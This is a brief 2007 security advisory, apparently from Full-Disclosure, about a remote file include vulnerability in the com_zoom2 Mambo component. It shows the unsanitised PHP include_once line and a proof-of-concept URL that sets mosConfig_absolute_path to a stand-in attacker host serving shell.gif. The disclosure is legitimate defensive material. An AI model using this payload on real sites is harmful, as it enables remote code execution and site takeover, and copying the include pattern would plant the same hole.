[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability

2007-04-11T00:00:00
ID SECURITYVULNS:DOC:16654
Type securityvulns
Reporter Securityvulns
Modified 2007-04-11T00:00:00

Description

com_zoom2 Mambo Module Remote File Include Vulnerability

autor:0o_zeus_o0 website:www.diosdelared.com mail:zeus@diosdelared.com 10/04/07

/components/com_zoom2/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http:/evil.com/shell.gif?

include_once("$mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php");

site download : http://mamboxchange.com/frs/download.php/3740/com_zoom_25_Beta.zip